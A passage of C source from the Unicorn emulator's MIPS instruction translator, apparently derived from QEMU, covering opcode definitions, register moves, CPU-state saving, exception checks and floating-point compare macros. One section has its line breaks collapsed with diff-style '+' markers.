    OPC_FCOR_df = (0x1 << 22) | OPC_MSA_3RF_1C,
    OPC_FCEQ_df = (0x2 << 22) | OPC_MSA_3RF_1A,
    OPC_FMUL_df = (0x2 << 22) | OPC_MSA_3RF_1B,
    OPC_FCUNE_df = (0x2 << 22) | OPC_MSA_3RF_1C,
    OPC_FCUEQ_df = (0x3 << 22) | OPC_MSA_3RF_1A,
    OPC_FDIV_df = (0x3 << 22) | OPC_MSA_3RF_1B,
    OPC_FCNE_df = (0x3 << 22) | OPC_MSA_3RF_1C,
    OPC_FCLT_df = (0x4 << 22) | OPC_MSA_3RF_1A,
    OPC_FMADD_df = (0x4 << 22) | OPC_MSA_3RF_1B,
    OPC_MUL_Q_df = (0x4 << 22) | OPC_MSA_3RF_1C,
    OPC_FCULT_df = (0x5 << 22) | OPC_MSA_3RF_1A,
    OPC_FMSUB_df = (0x5 << 22) | OPC_MSA_3RF_1B,
    OPC_MADD_Q_df = (0x5 << 22) | OPC_MSA_3RF_1C,
    OPC_FCLE_df = (0x6 << 22) | OPC_MSA_3RF_1A,
    OPC_MSUB_Q_df = (0x6 << 22) | OPC_MSA_3RF_1C,
    OPC_FCULE_df = (0x7 << 22) | OPC_MSA_3RF_1A,
    OPC_FEXP2_df = (0x7 << 22) | OPC_MSA_3RF_1B,
    OPC_FSAF_df = (0x8 << 22) | OPC_MSA_3RF_1A,
    OPC_FEXDO_df = (0x8 << 22) | OPC_MSA_3RF_1B,
    OPC_FSUN_df = (0x9 << 22) | OPC_MSA_3RF_1A,
    OPC_FSOR_df = (0x9 << 22) | OPC_MSA_3RF_1C,
    OPC_FSEQ_df = (0xA << 22) | OPC_MSA_3RF_1A,
    OPC_FTQ_df = (0xA << 22) | OPC_MSA_3RF_1B,
    OPC_FSUNE_df = (0xA << 22) | OPC_MSA_3RF_1C,
    OPC_FSUEQ_df = (0xB << 22) | OPC_MSA_3RF_1A,
    OPC_FSNE_df = (0xB << 22) | OPC_MSA_3RF_1C,
    OPC_FSLT_df = (0xC << 22) | OPC_MSA_3RF_1A,
    OPC_FMIN_df = (0xC << 22) | OPC_MSA_3RF_1B,
    OPC_MULR_Q_df = (0xC << 22) | OPC_MSA_3RF_1C,
    OPC_FSULT_df = (0xD << 22) | OPC_MSA_3RF_1A,
    OPC_FMIN_A_df = (0xD << 22) | OPC_MSA_3RF_1B,
    OPC_MADDR_Q_df = (0xD << 22) | OPC_MSA_3RF_1C,
    OPC_FSLE_df = (0xE << 22) | OPC_MSA_3RF_1A,
    OPC_FMAX_df = (0xE << 22) | OPC_MSA_3RF_1B,
    OPC_MSUBR_Q_df = (0xE << 22) | OPC_MSA_3RF_1C,
    OPC_FSULE_df = (0xF << 22) | OPC_MSA_3RF_1A,
    OPC_FMAX_A_df = (0xF << 22) | OPC_MSA_3RF_1B,

    /* BIT instruction df(bits 22..16) = _B _H _W _D */
    OPC_SLLI_df = (0x0 << 23) | OPC_MSA_BIT_09,
    OPC_SAT_S_df = (0x0 << 23) | OPC_MSA_BIT_0A,
    OPC_SRAI_df = (0x1 << 23) | OPC_MSA_BIT_09,
    OPC_SAT_U_df = (0x1 << 23) | OPC_MSA_BIT_0A,
    OPC_SRLI_df = (0x2 << 23) | OPC_MSA_BIT_09,
    OPC_SRARI_df = (0x2 << 23) | OPC_MSA_BIT_0A,
    OPC_BCLRI_df = (0x3 << 23) | OPC_MSA_BIT_09,
    OPC_SRLRI_df = (0x3 << 23) | OPC_MSA_BIT_0A,
    OPC_BSETI_df = (0x4 << 23) | OPC_MSA_BIT_09,
    OPC_BNEGI_df = (0x5 << 23) | OPC_MSA_BIT_09,
    OPC_BINSLI_df = (0x6 << 23) | OPC_MSA_BIT_09,
    OPC_BINSRI_df = (0x7 << 23) |
OPC_MSA_BIT_09, +}; + + +#define gen_helper_0e0i(tcg_ctx, name, arg) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg); \ + gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_0e1i(tcg_ctx, name, arg1, arg2) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg2); \ + gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_1e0i(tcg_ctx, name, ret, arg1) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg1); \ + gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_1e1i(tcg_ctx, name, ret, arg1, arg2) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg2); \ + gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_0e2i(tcg_ctx, name, arg1, arg2, arg3) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg3); \ + gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, arg2, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_1e2i(tcg_ctx, name, ret, arg1, arg2, arg3) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg3); \ + gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, arg2, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_0e3i(tcg_ctx, name, arg1, arg2, arg3, arg4) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg4); \ + gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, arg2, arg3, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +typedef struct DisasContext { + struct TranslationBlock *tb; + target_ulong pc, saved_pc; + uint32_t opcode; + int singlestep_enabled; + int insn_flags; + int32_t CP0_Config1; + /* Routine used to access memory */ + int mem_idx; 
    uint32_t hflags, saved_hflags; /* saved_hflags mirrors what is in the
                                      hflags TCG global (see save_cpu_state) */
    int bstate;                    /* one of the BS_* values below */
    target_ulong btarget;
    bool ulri;
    int kscrexist;
    bool rxi;
    int ie;
    bool bi;
    bool bp;
    // Unicorn engine
    struct uc_struct *uc;
} DisasContext;

/* Values for DisasContext.bstate: why/how the translation loop stops. */
enum {
    BS_NONE = 0, /* We go out of the TB without reaching a branch or an
                  * exception condition */
    BS_STOP = 1, /* We want to stop translation for any reason */
    BS_BRANCH = 2, /* We reached a branch condition */
    BS_EXCP = 3, /* We reached an exception condition */
};

/* o32 ABI names for the 32 integer GPRs, used only for disassembly logs. */
static const char * const regnames[] = {
    "r0", "at", "v0", "v1", "a0", "a1", "a2", "a3",
    "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7",
    "s0", "s1", "s2", "s3", "s4", "s5", "s6", "s7",
    "t8", "t9", "k0", "k1", "gp", "sp", "s8", "ra",
};

static const char * const regnames_HI[] = {
    "HI0", "HI1", "HI2", "HI3",
};

static const char * const regnames_LO[] = {
    "LO0", "LO1", "LO2", "LO3",
};

static const char * const fregnames[] = {
    "f0",  "f1",  "f2",  "f3",  "f4",  "f5",  "f6",  "f7",
    "f8",  "f9",  "f10", "f11", "f12", "f13", "f14", "f15",
    "f16", "f17", "f18", "f19", "f20", "f21", "f22", "f23",
    "f24", "f25", "f26", "f27", "f28", "f29", "f30", "f31",
};

/* MSA registers viewed as pairs of 64-bit halves (w<N>.d0 / w<N>.d1). */
static const char * const msaregnames[] = {
    "w0.d0",  "w0.d1",  "w1.d0",  "w1.d1",
    "w2.d0",  "w2.d1",  "w3.d0",  "w3.d1",
    "w4.d0",  "w4.d1",  "w5.d0",  "w5.d1",
    "w6.d0",  "w6.d1",  "w7.d0",  "w7.d1",
    "w8.d0",  "w8.d1",  "w9.d0",  "w9.d1",
    "w10.d0", "w10.d1", "w11.d0", "w11.d1",
    "w12.d0", "w12.d1", "w13.d0", "w13.d1",
    "w14.d0", "w14.d1", "w15.d0", "w15.d1",
    "w16.d0", "w16.d1", "w17.d0", "w17.d1",
    "w18.d0", "w18.d1", "w19.d0", "w19.d1",
    "w20.d0", "w20.d1", "w21.d0", "w21.d1",
    "w22.d0", "w22.d1", "w23.d0", "w23.d1",
    "w24.d0", "w24.d1", "w25.d0", "w25.d1",
    "w26.d0", "w26.d1", "w27.d0", "w27.d1",
    "w28.d0", "w28.d1", "w29.d0", "w29.d1",
    "w30.d0", "w30.d1", "w31.d0", "w31.d1",
};

/* Log one disassembled instruction (pc + raw opcode + formatted text)
   when CPU_LOG_TB_IN_ASM logging is enabled; compiles away otherwise. */
#define MIPS_DEBUG(fmt, ...)                                              \
    do {                                                                  \
        if (MIPS_DEBUG_DISAS) {                                           \
            qemu_log_mask(CPU_LOG_TB_IN_ASM,                              \
                          TARGET_FMT_lx ": %08x " fmt "\n",               \
                          ctx->pc, ctx->opcode , ## __VA_ARGS__);         \
        }                                                                 \
    } while (0)

#define LOG_DISAS(...)                                                    \
    do {                                                                  \
        if (MIPS_DEBUG_DISAS) {                                           \
            qemu_log_mask(CPU_LOG_TB_IN_ASM, ## __VA_ARGS__);             \
        }                                                                 \
    } while (0)

/* Log an invalid encoding: major opcode, function field, rt field. */
#define MIPS_INVAL(op)                                                    \
    MIPS_DEBUG("Invalid %s %03x %03x %03x", op, ctx->opcode >> 26,        \
               ctx->opcode & 0x3F, ((ctx->opcode >> 16) & 0x1F))

/* General purpose registers moves. */
static inline void gen_load_gpr (DisasContext *s, TCGv t, int reg)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr;
    /* $0 is architecturally hardwired to zero, so there is no TCG
       global for it -- materialize the constant instead. */
    if (reg == 0)
        tcg_gen_movi_tl(tcg_ctx, t, 0);
    else
        tcg_gen_mov_tl(tcg_ctx, t, *cpu_gpr[reg]);
}

static inline void gen_store_gpr (TCGContext *tcg_ctx, TCGv t, int reg)
{
    TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr;
    /* Writes to $0 are silently discarded. */
    if (reg != 0)
        tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[reg], t);
}

/* Moves to/from shadow registers. */
static inline void gen_load_srsgpr (DisasContext *s, int from, int to)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv t0 = tcg_temp_new(tcg_ctx);

    if (from == 0)
        tcg_gen_movi_tl(tcg_ctx, t0, 0);
    else {
        TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx);
        TCGv_ptr addr = tcg_temp_new_ptr(tcg_ctx);

        /* Index the previous shadow set: addr = env +
           SRSCtl.PSS * sizeof(one 32-register bank). */
        tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SRSCtl));
        tcg_gen_shri_i32(tcg_ctx, t2, t2, CP0SRSCtl_PSS);
        tcg_gen_andi_i32(tcg_ctx, t2, t2, 0xf);
        tcg_gen_muli_i32(tcg_ctx, t2, t2, sizeof(target_ulong) * 32);
        tcg_gen_ext_i32_ptr(tcg_ctx, addr, t2);
        tcg_gen_add_ptr(tcg_ctx, addr, tcg_ctx->cpu_env, addr);

        tcg_gen_ld_tl(tcg_ctx, t0, addr, sizeof(target_ulong) * from);
        tcg_temp_free_ptr(tcg_ctx, addr);
        tcg_temp_free_i32(tcg_ctx, t2);
    }
    gen_store_gpr(tcg_ctx, t0, to);
    tcg_temp_free(tcg_ctx, t0);
}

static inline void gen_store_srsgpr (DisasContext *s, int from, int to)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    /* Target register 0 in the shadow set is still the zero register. */
    if (to != 0) {
        TCGv t0 = tcg_temp_new(tcg_ctx);
        TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx);
        TCGv_ptr addr = tcg_temp_new_ptr(tcg_ctx);

        gen_load_gpr(s, t0, from);
        /* Same SRSCtl.PSS bank computation as gen_load_srsgpr above. */
        tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SRSCtl));
        tcg_gen_shri_i32(tcg_ctx, t2, t2, CP0SRSCtl_PSS);
        tcg_gen_andi_i32(tcg_ctx, t2, t2, 0xf);
        tcg_gen_muli_i32(tcg_ctx, t2, t2, sizeof(target_ulong) * 32);
        tcg_gen_ext_i32_ptr(tcg_ctx, addr, t2);
        tcg_gen_add_ptr(tcg_ctx, addr, tcg_ctx->cpu_env, addr);

        tcg_gen_st_tl(tcg_ctx, t0, addr, sizeof(target_ulong) * to);
        tcg_temp_free_ptr(tcg_ctx, addr);
        tcg_temp_free_i32(tcg_ctx, t2);
        tcg_temp_free(tcg_ctx, t0);
    }
}

/* Floating point register moves.  FPRs are stored as 64-bit values
   (fpu_f64); 32-bit views read/write one half of that storage. */
static void gen_load_fpr32(DisasContext *s, TCGv_i32 t, int reg)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    tcg_gen_trunc_i64_i32(tcg_ctx, t, tcg_ctx->fpu_f64[reg]);
}

static void gen_store_fpr32(DisasContext *s, TCGv_i32 t, int reg)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx);
    tcg_gen_extu_i32_i64(tcg_ctx, t64, t);
    /* Only replace the low 32 bits; the high half is preserved. */
    tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], tcg_ctx->fpu_f64[reg], t64, 0, 32);
    tcg_temp_free_i64(tcg_ctx, t64);
}

static void gen_load_fpr32h(DisasContext *ctx, TCGv_i32 t, int reg)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if (ctx->hflags & MIPS_HFLAG_F64) {
        /* FR=1: the high word lives in bits 63..32 of the same FPR. */
        TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx);
        tcg_gen_shri_i64(tcg_ctx, t64, tcg_ctx->fpu_f64[reg], 32);
        tcg_gen_trunc_i64_i32(tcg_ctx, t, t64);
        tcg_temp_free_i64(tcg_ctx, t64);
    } else {
        /* FR=0: the high word is the odd register of the even/odd pair. */
        gen_load_fpr32(ctx, t, reg | 1);
    }
}

static void gen_store_fpr32h(DisasContext *ctx, TCGv_i32 t, int reg)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if (ctx->hflags & MIPS_HFLAG_F64) {
        TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx);
        tcg_gen_extu_i32_i64(tcg_ctx, t64, t);
        tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], tcg_ctx->fpu_f64[reg], t64, 32, 32);
        tcg_temp_free_i64(tcg_ctx, t64);
    } else {
        gen_store_fpr32(ctx, t, reg | 1);
    }
}

static void gen_load_fpr64(DisasContext *ctx, TCGv_i64 t, int reg)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if (ctx->hflags & MIPS_HFLAG_F64) {
        tcg_gen_mov_i64(tcg_ctx, t, tcg_ctx->fpu_f64[reg]);
    } else {
        /* FR=0: a 64-bit value spans the even/odd register pair. */
        tcg_gen_concat32_i64(tcg_ctx, t, tcg_ctx->fpu_f64[reg & ~1], tcg_ctx->fpu_f64[reg | 1]);
    }
}

static void gen_store_fpr64(DisasContext *ctx, TCGv_i64 t, int reg)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if (ctx->hflags & MIPS_HFLAG_F64) {
        tcg_gen_mov_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], t);
    } else {
        TCGv_i64 t0;
        /* Low word to the even register, high word to the odd one;
           only the low 32 bits of each backing slot are touched. */
        tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg & ~1], tcg_ctx->fpu_f64[reg & ~1], t, 0, 32);
        t0 = tcg_temp_new_i64(tcg_ctx);
        tcg_gen_shri_i64(tcg_ctx, t0, t, 32);
        tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg | 1], tcg_ctx->fpu_f64[reg | 1], t0, 0, 32);
        tcg_temp_free_i64(tcg_ctx, t0);
    }
}

/* Map an FP condition-code number to its bit position in FCSR:
   cc 0 is bit 23, cc 1..7 are bits 25..31. */
static inline int get_fp_bit (int cc)
{
    if (cc)
        return 24 + cc;
    else
        return 23;
}

/* Tests */
static inline void gen_save_pc(DisasContext *ctx, target_ulong pc)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_PC, pc);
}

/* Flush lazily-tracked translation state (PC, hflags, branch target)
   out to the CPU globals, so a helper/exception sees a consistent
   architectural state.  Only writes what has actually changed. */
static inline void save_cpu_state (DisasContext *ctx, int do_save_pc)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    LOG_DISAS("hflags %08x saved %08x\n", ctx->hflags, ctx->saved_hflags);
    if (do_save_pc && ctx->pc != ctx->saved_pc) {
        gen_save_pc(ctx, ctx->pc);
        ctx->saved_pc = ctx->pc;
    }
    if (ctx->hflags != ctx->saved_hflags) {
        tcg_gen_movi_i32(tcg_ctx, tcg_ctx->hflags, ctx->hflags);
        ctx->saved_hflags = ctx->hflags;
        switch (ctx->hflags & MIPS_HFLAG_BMASK_BASE) {
        case MIPS_HFLAG_BR:
            /* Register branch: btarget already lives in the TCG global. */
            break;
        case MIPS_HFLAG_BC:
        case MIPS_HFLAG_BL:
        case MIPS_HFLAG_B:
            tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->btarget, ctx->btarget);
            break;
        }
    }
}

/* Inverse of save_cpu_state: refresh the DisasContext copies from the
   CPU state at translation start. */
static inline void restore_cpu_state (CPUMIPSState *env, DisasContext *ctx)
{
    ctx->saved_hflags = ctx->hflags;
    switch (ctx->hflags & MIPS_HFLAG_BMASK_BASE) {
    case MIPS_HFLAG_BR:
        break;
    case MIPS_HFLAG_BC:
    case MIPS_HFLAG_BL:
    case MIPS_HFLAG_B:
        ctx->btarget = env->btarget;
        break;
    }
}

static inline void
generate_exception_err (DisasContext *ctx, int excp, int err)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 texcp = tcg_const_i32(tcg_ctx, excp);
    TCGv_i32 terr = tcg_const_i32(tcg_ctx, err);
    /* State must be committed first: the helper longjmps out. */
    save_cpu_state(ctx, 1);
    gen_helper_raise_exception_err(tcg_ctx, tcg_ctx->cpu_env, texcp, terr);
    tcg_temp_free_i32(tcg_ctx, terr);
    tcg_temp_free_i32(tcg_ctx, texcp);
}

static inline void
generate_exception (DisasContext *ctx, int excp)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    save_cpu_state(ctx, 1);
    gen_helper_0e0i(tcg_ctx, raise_exception, excp);
}

/* Addresses computation */
static inline void gen_op_addr_add (DisasContext *ctx, TCGv ret, TCGv arg0, TCGv arg1)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_add_tl(tcg_ctx, ret, arg0, arg1);

#if defined(TARGET_MIPS64)
    /* 32-bit compatibility mode: addresses wrap (sign-extend) to 32 bits. */
    if (ctx->hflags & MIPS_HFLAG_AWRAP) {
        tcg_gen_ext32s_i64(tcg_ctx, ret, ret);
    }
#endif
}

/* Addresses computation (translation time) */
static target_long addr_add(DisasContext *ctx, target_long base,
                            target_long offset)
{
    target_long sum = (target_long)((target_ulong)base + offset);

#if defined(TARGET_MIPS64)
    if (ctx->hflags & MIPS_HFLAG_AWRAP) {
        sum = (int32_t)sum;
    }
#endif
    return sum;
}

/* Raise a coprocessor-unusable exception unless CP0 is accessible. */
static inline void check_cp0_enabled(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_CP0)))
        generate_exception_err(ctx, EXCP_CpU, 0);
}

static inline void check_cp1_enabled(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_FPU)))
        generate_exception_err(ctx, EXCP_CpU, 1);
}

/* Verify that the processor is running with COP1X instructions enabled.
   This is associated with the nabla symbol in the MIPS32 and MIPS64
   opcode tables.
*/

static inline void check_cop1x(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_COP1X)))
        generate_exception(ctx, EXCP_RI);
}

/* Verify that the processor is running with 64-bit floating-point
   operations enabled. */

static inline void check_cp1_64bitmode(DisasContext *ctx)
{
    /* Both F64 and COP1X must be set; ~hflags & mask is non-zero if
       either bit is missing. */
    if (unlikely(~ctx->hflags & (MIPS_HFLAG_F64 | MIPS_HFLAG_COP1X)))
        generate_exception(ctx, EXCP_RI);
}

/*
 * Verify if floating point register is valid; an operation is not defined
 * if bit 0 of any register specification is set and the FR bit in the
 * Status register equals zero, since the register numbers specify an
 * even-odd pair of adjacent coprocessor general registers. When the FR bit
 * in the Status register equals one, both even and odd register numbers
 * are valid. This limitation exists only for 64 bit wide (d,l,ps) registers.
 *
 * Multiple 64 bit wide registers can be checked by calling
 * gen_op_cp1_registers(freg1 | freg2 | ... | fregN);
 */
static inline void check_cp1_registers(DisasContext *ctx, int regs)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_F64) && (regs & 1)))
        generate_exception(ctx, EXCP_RI);
}

/* Verify that the processor is running with DSP instructions enabled.
   This is enabled by CP0 Status register MX(24) bit.
 */

static inline void check_dsp(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSP))) {
        /* CPU has the ASE but it is disabled -> DSP-disabled exception;
           CPU lacks the ASE entirely -> reserved instruction. */
        if (ctx->insn_flags & ASE_DSP) {
            generate_exception(ctx, EXCP_DSPDIS);
        } else {
            generate_exception(ctx, EXCP_RI);
        }
    }
}

static inline void check_dspr2(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSPR2))) {
        if (ctx->insn_flags & ASE_DSP) {
            generate_exception(ctx, EXCP_DSPDIS);
        } else {
            generate_exception(ctx, EXCP_RI);
        }
    }
}

/* This code generates a "reserved instruction" exception if the
   CPU does not support the instruction set corresponding to flags.
 */
static inline void check_insn(DisasContext *ctx, int flags)
{
    if (unlikely(!(ctx->insn_flags & flags))) {
        generate_exception(ctx, EXCP_RI);
    }
}

/* This code generates a "reserved instruction" exception if the
   CPU has corresponding flag set which indicates that the instruction
   has been removed. */
static inline void check_insn_opc_removed(DisasContext *ctx, int flags)
{
    if (unlikely(ctx->insn_flags & flags)) {
        generate_exception(ctx, EXCP_RI);
    }
}

#ifdef TARGET_MIPS64
/* This code generates a "reserved instruction" exception if 64-bit
   instructions are not enabled. */
static inline void check_mips_64(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_64)))
        generate_exception(ctx, EXCP_RI);
}
#endif

/* Define small wrappers for gen_load_fpr* so that we have a uniform
   calling interface for 32 and 64-bit FPRs.  No sense in changing
   all callers for gen_load_fpr32 when we need the CTX parameter for
   this one use. */
#define gen_ldcmp_fpr32(ctx, x, y) gen_load_fpr32(ctx, x, y)
#define gen_ldcmp_fpr64(ctx, x, y) gen_load_fpr64(ctx, x, y)
/* Expand one gen_cmp<type>_<fmt>() emitter: loads fs/ft, applies the
   required mode/register checks for the format, then dispatches on the
   4-bit condition number n to the matching c.cond.fmt helper. */
#define FOP_CONDS(type, abs, fmt, ifmt, bits)                             \
static inline void gen_cmp ## type ## _ ## fmt(DisasContext *ctx, int n,  \
                                               int ft, int fs, int cc)    \
{                                                                         \
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;                               \
    TCGv_i##bits fp0 = tcg_temp_new_i##bits (tcg_ctx);                    \
    TCGv_i##bits fp1 = tcg_temp_new_i##bits (tcg_ctx);                    \
    switch (ifmt) {                                                       \
    case FMT_PS:                                                          \
        check_cp1_64bitmode(ctx);                                         \
        break;                                                            \
    case FMT_D:                                                           \
        if (abs) {                                                        \
            check_cop1x(ctx);                                             \
        }                                                                 \
        check_cp1_registers(ctx, fs | ft);                                \
        break;                                                            \
    case FMT_S:                                                           \
        if (abs) {                                                        \
            check_cop1x(ctx);                                             \
        }                                                                 \
        break;                                                            \
    }                                                                     \
    gen_ldcmp_fpr##bits (ctx, fp0, fs);                                   \
    gen_ldcmp_fpr##bits (ctx, fp1, ft);                                   \
    switch (n) {                                                          \
    case 0: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _f, fp0, fp1, cc); break;\
    case 1: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _un, fp0, fp1, cc); break;\
    case 2: gen_helper_0e2i(tcg_ctx, cmp ##
type ## _ ## fmt ## _eq, fp0, fp1, cc); break;\
    case 3: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ueq, fp0, fp1, cc); break;\
    case 4: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _olt, fp0, fp1, cc); break;\
    case 5: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ult, fp0, fp1, cc); break;\
    case 6: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ole, fp0, fp1, cc); break;\
    case 7: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ule, fp0, fp1, cc); break;\
    case 8: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _sf, fp0, fp1, cc); break;\
    case 9: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ngle, fp0, fp1, cc); break;\
    case 10: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _seq, fp0, fp1, cc); break;\
    case 11: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ngl, fp0, fp1, cc); break;\
    case 12: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _lt, fp0, fp1, cc); break;\
    case 13: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _nge, fp0, fp1, cc); break;\
    case 14: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _le, fp0, fp1, cc); break;\
    case 15: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ngt, fp0, fp1, cc); break;\
    default: abort();                                                     \
    }                                                                     \
    tcg_temp_free_i##bits (tcg_ctx, fp0);                                 \
    tcg_temp_free_i##bits (tcg_ctx, fp1);                                 \
}

/* Pre-R6 c.cond.fmt emitters: plain and "abs" (COP1X) variants for
   double, single and paired-single formats. */
FOP_CONDS(, 0, d, FMT_D, 64)
FOP_CONDS(abs, 1, d, FMT_D, 64)
FOP_CONDS(, 0, s, FMT_S, 32)
FOP_CONDS(abs, 1, s, FMT_S, 32)
FOP_CONDS(, 0, ps, FMT_PS, 64)
FOP_CONDS(abs, 1, ps, FMT_PS, 64)
#undef FOP_CONDS

/* R6 CMP.cond.fmt emitters: result is an all-ones/all-zeros mask
   written to fd via STORE instead of an FCSR condition bit. */
#define FOP_CONDNS(fmt, ifmt, bits, STORE)                                \
static inline void gen_r6_cmp_ ## fmt(DisasContext * ctx, int n,          \
                                      int ft, int fs, int fd)             \
{                                                                         \
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;                               \
    TCGv_i ## bits fp0 = tcg_temp_new_i ## bits(tcg_ctx);                 \
    TCGv_i ## bits fp1 = tcg_temp_new_i ## bits(tcg_ctx);                 \
    switch (ifmt) {                                                       \
    default: break;                                                       \
    case FMT_D:                                                           \
        check_cp1_registers(ctx, fs | ft | fd);                           \
        break;                                                            \
    }                                                                     \
    gen_ldcmp_fpr ## bits(ctx, fp0, fs);                                  \
    gen_ldcmp_fpr ## bits(ctx, fp1, ft);                                  \
    switch (n) {                                                          \
    case 0:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _af(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 1:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _un(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 2:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _eq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 3:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _ueq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 4:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _lt(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 5:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _ult(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 6:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _le(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 7:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _ule(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 8:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _saf(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 9:                                                               \
        gen_helper_r6_cmp_ ## fmt ## _sun(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 10:                                                              \
